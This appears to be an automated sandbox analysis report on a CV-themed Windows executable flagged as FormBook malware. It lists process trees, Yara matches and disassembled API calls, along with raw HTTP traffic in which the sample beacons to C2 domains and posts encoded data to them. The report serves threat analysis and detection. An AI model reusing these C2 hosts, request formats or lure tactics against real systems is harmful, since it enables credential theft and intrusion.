0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49876	209.74.77.108	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:59.146897078 CET	448	OUT	GET /grm8/?UH=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&E2ThV=44spoH HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.mindfulmo.life User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Nov 24, 2024 08:07:00.358128071 CET	548	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:07:00 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49894	35.220.176.144	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:07:06.734493971 CET	725	OUT	POST /z7sc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.bienmaigrir.info Origin: http://www.bienmaigrir.info Referer: http://www.bienmaigrir.info/z7sc/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 6f 72 61 6b 31 30 57 53 6f 49 69 55 69 57 69 4e 56 69 56 52 68 45 55 75 65 6a 69 51 6f 6a 71 39 35 77 43 4c 6e 70 45 78 62 6f 38 47 57 36 43 37 35 7a 4c 76 4b 61 6e 58 4c 63 54 2b 45 63 35 38 62 6e 51 4e 41 78 34 6a 72 35 41 75 4c 4d 4a 74 68 38 38 79 53 6b 73 64 56 4c 49 54 46 35 38 30 44 61 64 53 4b 68 6d 46 76 73 58 63 4a 76 2b 6e 66 69 56 32 41 54 38 72 66 58 44 6a 6b 43 32 63 4a 66 78 4e 30 44 50 61 32 4e 66 35 31 72 70 49 62 66 71 76 45 34 42 64 76 30 6b 6d 75 61 31 7a 39 72 4e 7a 33 44 32 53 39 74 6e 33 4d 49 58 74 30 76 5a 75 64 43 75 70 5a 69 4f 71 79 2b 47 30 4e 51 3d 3d Data Ascii: UH=orak10WSoIiUiWiNViVRhEUuejiQojq95wCLnpExbo8GW6C75zLvKanXLcT+Ec58bnQNAx4jr5AuLMJth88ySksdVLITF580DadSKhmFvsXcJv+nfiV2AT8rfXDjkC2cJfxN0DPa2Nf51rpIbfqvE4Bdv0kmua1z9rNz3D2S9tn3MIXt0vZudCupZiOqy+G0NQ==
Nov 24, 2024 08:07:08.187767029 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:07:07 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49901	35.220.176.144	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:07:09.494127035 CET	745	OUT	POST /z7sc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.bienmaigrir.info Origin: http://www.bienmaigrir.info Referer: http://www.bienmaigrir.info/z7sc/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 6f 72 61 6b 31 30 57 53 6f 49 69 55 6a 7a 79 4e 54 44 56 52 6e 6b 55 74 62 6a 69 51 78 54 71 35 35 77 4f 4c 6e 6f 41 68 62 61 59 47 57 65 47 37 2b 32 2f 76 66 61 6e 58 54 73 54 42 41 63 35 4a 62 6e 4e 2b 41 30 51 6a 72 35 55 75 4c 4d 35 74 67 4e 38 78 54 30 73 44 59 72 49 52 4b 5a 38 30 44 61 64 53 4b 68 69 38 76 73 66 63 49 66 4f 6e 66 41 74 33 47 6a 38 6f 59 58 44 6a 33 53 32 59 4a 66 78 6a 30 42 37 67 32 4f 6e 35 31 70 42 49 61 4f 71 77 4b 34 42 62 67 55 6c 6d 70 36 41 34 2f 62 41 59 76 6a 2b 74 36 4a 6d 58 4e 4f 61 33 6c 65 34 35 50 43 4b 61 45 6c 48 65 2f 39 37 39 57 66 38 39 79 6e 59 51 30 32 34 76 7a 55 2b 47 38 5a 46 44 38 73 59 3d Data Ascii: UH=orak10WSoIiUjzyNTDVRnkUtbjiQxTq55wOLnoAhbaYGWeG7+2/vfanXTsTBAc5JbnN+A0Qjr5UuLM5tgN8xT0sDYrIRKZ80DadSKhi8vsfcIfOnfAt3Gj8oYXDj3S2YJfxj0B7g2On51pBIaOqwK4BbgUlmp6A4/bAYvj+t6JmXNOa3le45PCKaElHe/979Wf89ynYQ024vzU+G8ZFD8sY=
Nov 24, 2024 08:07:10.975737095 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:07:10 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49908	35.220.176.144	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:07:12.159722090 CET	10827	OUT	POST /z7sc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 10299 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.bienmaigrir.info Origin: http://www.bienmaigrir.info Referer: http://www.bienmaigrir.info/z7sc/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 6f 72 61 6b 31 30 57 53 6f 49 69 55 6a 7a 79 4e 54 44 56 52 6e 6b 55 74 62 6a 69 51 78 54 71 35 35 77 4f 4c 6e 6f 41 68 62 61 51 47 57 72 53 37 34 56 58 76 4e 71 6e 58 4e 63 54 36 41 63 35 51 62 6e 45 57 41 30 63 56 72 37 73 75 4c 74 5a 74 6f 66 55 78 4b 6b 73 44 48 37 49 51 46 35 39 77 44 61 4e 73 4b 68 53 38 76 73 66 63 49 64 6d 6e 49 43 56 33 45 6a 38 72 66 58 44 52 6b 43 32 38 4a 66 49 65 30 42 76 77 32 2b 48 35 32 4a 52 49 63 34 65 77 43 34 42 5a 6c 55 6c 49 70 36 63 33 2f 62 4d 2b 76 69 36 48 36 4f 57 58 4d 49 53 70 34 75 67 47 59 78 32 30 61 45 6a 38 34 74 7a 71 59 39 6b 31 31 31 77 78 75 6b 49 69 34 45 50 6b 37 72 42 67 2b 6f 58 64 53 7a 2b 79 68 42 4f 6c 51 6b 63 58 6c 67 64 43 6b 48 59 67 58 67 64 77 44 42 45 31 69 2b 61 44 36 4a 43 77 50 74 71 55 7a 6f 72 4b 65 6d 54 66 78 64 53 51 58 4d 55 47 5a 52 59 65 66 43 6b 54 59 78 38 74 7a 43 53 68 65 4b 67 38 62 66 6e 56 64 76 4e 58 54 66 36 51 45 71 66 6d 6c 36 32 6e 4f 45 2b 6f 7a 31 68 63 57 4c 43 54 36 73 38 38 67 67 6a 59 37 57 66 [TRUNCATED] Data Ascii: UH=orak10WSoIiUjzyNTDVRnkUtbjiQxTq55wOLnoAhbaQGWrS74VXvNqnXNcT6Ac5QbnEWA0cVr7suLtZtofUxKksDH7IQF59wDaNsKhS8vsfcIdmnICV3Ej8rfXDRkC28JfIe0Bvw2+H52JRIc4ewC4BZlUlIp6c3/bM+vi6H6OWXMISp4ugGYx20aEj84tzqY9k111wxukIi4EPk7rBg+oXdSz+yhBOlQkcXlgdCkHYgXgdwDBE1i+aD6JCwPtqUzorKemTfxdSQXMUGZRYefCkTYx8tzCSheKg8bfnVdvNXTf6QEqfml62nOE+oz1hcWLCT6s88ggjY7WfQ5M3IJa28FEGv86Cq6lv/lhqwn98qaBpM7QiIim5244wSYnLAYfShpOMZ7OqVVEUrrcagddYKhSkKzrNeMWLGGhEIsIIDjPyO5AyiJRhkfnc5W+ChpaFYGS0ZQMWyZm22hSXcwK/jLk7kpmdA/Mc5xAD+xTgxgOEygLFjJXi1EIhFnxivDkMvhiL41fJ+awdKhrhTSc894BbUHNRUlrYhKWcCVDwkz6fHVMS3x9cd8HvAamP9COkdeIqNy5mtBwMgCHg4+9lH2tvSbbLVP8D5d4mZ/aBuh1Fzx5r8L6vZBd4dy7LDBCuqs4uW3Wj7qsaOKuoI6OHPPIqajY/dUgaCQ82TdeZBJPexFBbBUAe8dAlzuAxqeLlNiX59BRw14Vs+G3rjf0tyxlaLhlTIBNaWrleb5jI2oozGjUEg4tU+ka6D4zQCtOXX8ssRQ+ExfT/u6aMX134Y6e4QOU048dwJygrGA3JWijcXql5nkxv/M1y+XJ8QxAQYwrv+01atqRQo+23ialQQaLbEi3MqQhhGiEWiEdbOfSFP5VIgCmLLS745Kk4DDlayhxDlYSO7p3BrXxLkUou65sCrGmCOWVMSiZMlyscU7xh/FBNFtw+cGUn9hYtHBPfdxHmOEXljr/Ms1roFVm+FUmk4LfxvFXwRyU6A3zwwpseCK [TRUNCATED]
Nov 24, 2024 08:07:13.677743912 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:07:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49914	35.220.176.144	80

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:07:15.199160099 CET	450	OUT	GET /z7sc/?UH=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&E2ThV=44spoH HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.bienmaigrir.info User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Nov 24, 2024 08:07:16.779777050 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:07:16 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	02:05:08
Start date:	24/11/2024
Path:	C:\Users\user\Desktop\CV_ Filipa Barbosa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CV_ Filipa Barbosa.exe"
Imagebase:	0x2f0000
File size:	1'206'784 bytes
MD5 hash:	A3C71C0BE44A3F3585056ACF51FD4C48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:05:10
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CV_ Filipa Barbosa.exe"
Imagebase:	0xe90000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2156547508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2158110469.0000000006190000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2157416281.0000000003FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:05:41
Start date:	24/11/2024
Path:	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe"
Imagebase:	0xea0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2998584831.00000000027D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	02:05:43
Start date:	24/11/2024
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\wlanext.exe"
Imagebase:	0xd80000
File size:	78'336 bytes
MD5 hash:	0D5F0A7CA2A8A47E3A26FB1CB67E118C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2998690477.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2998739243.0000000000900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2997273586.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:05:56
Start date:	24/11/2024
Path:	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe"
Imagebase:	0xea0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3000295017.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:06:09
Start date:	24/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	152

Executed Functions

Function 0031B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec333b76d9f78b58e7bcb59f7d03c6d391bb8fc57d47357d7ac423b58d17889a
Instruction ID: 96af97e6323cb4486b45c4f3216e1f673422309d01bf311a4607f34259f57e13
Opcode Fuzzy Hash: ec333b76d9f78b58e7bcb59f7d03c6d391bb8fc57d47357d7ac423b58d17889a
Instruction Fuzzy Hash: 97325F75A022288FDB2A8F15DC416E9B7B9FF4A310F5941D9E40AE7A91D7309EC0CF52

Function 002F3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,002F3AA3,?), ref: 002F3D45
IsDebuggerPresent.KERNEL32(?,?,?,?,002F3AA3,?), ref: 002F3D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,003B1148,003B1130,?,?,?,?,002F3AA3,?), ref: 002F3DC8

Part of subcall function 002F6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002F3DEE,003B1148,?,?,?,?,?,002F3AA3,?), ref: 002F6471

SetCurrentDirectoryW.KERNEL32(?,?,?,002F3AA3,?), ref: 002F3E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003A28F4,00000010), ref: 00361CCE
SetCurrentDirectoryW.KERNEL32(?,003B1148,?,?,?,?,?,002F3AA3,?), ref: 00361D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0038DAB4,003B1148,?,?,?,?,?,002F3AA3,?), ref: 00361D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,002F3AA3), ref: 00361D90

Part of subcall function 002F3E6E: GetSysColorBrush.USER32(0000000F), ref: 002F3E79
Part of subcall function 002F3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 002F3E88
Part of subcall function 002F3E6E: LoadIconW.USER32(00000063), ref: 002F3E9E
Part of subcall function 002F3E6E: LoadIconW.USER32(000000A4), ref: 002F3EB0
Part of subcall function 002F3E6E: LoadIconW.USER32(000000A2), ref: 002F3EC2
Part of subcall function 002F3E6E: RegisterClassExW.USER32(?), ref: 002F3F30

Part of subcall function 002F36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002F36E6
Part of subcall function 002F36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002F3707
Part of subcall function 002F36B8: ShowWindow.USER32(00000000,?,?,?,?,002F3AA3,?), ref: 002F371B
Part of subcall function 002F36B8: ShowWindow.USER32(00000000,?,?,?,?,002F3AA3,?), ref: 002F3724

Part of subcall function 002F4FFC: _memset.LIBCMT ref: 002F5022
Part of subcall function 002F4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002F50CB

Strings

runas, xrefs: 00361D84
This is a third-party compiled AutoIt script., xrefs: 00361CC8
():, xrefs: 00361D49

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ():$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-1547992737
Opcode ID: 61519711d9393986cb13e64f48831e9781e49aba4a19fe73416319f37e7c4543
Instruction ID: 57a4f6b4eea4d24bb50e058a00521c287f273d1ad188117a77dde817c6922c3c
Opcode Fuzzy Hash: 61519711d9393986cb13e64f48831e9781e49aba4a19fe73416319f37e7c4543
Instruction Fuzzy Hash: 8551F334A2424DBACB13EBB8DC56DFEBB7D9F05B88F004274F70166192DA7446558F21

Function 0030DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0030DDEC
GetCurrentProcess.KERNEL32(00000000,0038DC38,?,?), ref: 0030DEAC
GetNativeSystemInfo.KERNELBASE(?,0038DC38,?,?), ref: 0030DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0030DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0030DF1F
GetSystemInfo.KERNEL32(?,0038DC38,?,?), ref: 0030DF29
GetSystemInfo.KERNEL32(?,0038DC38,?,?), ref: 0030DF35

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
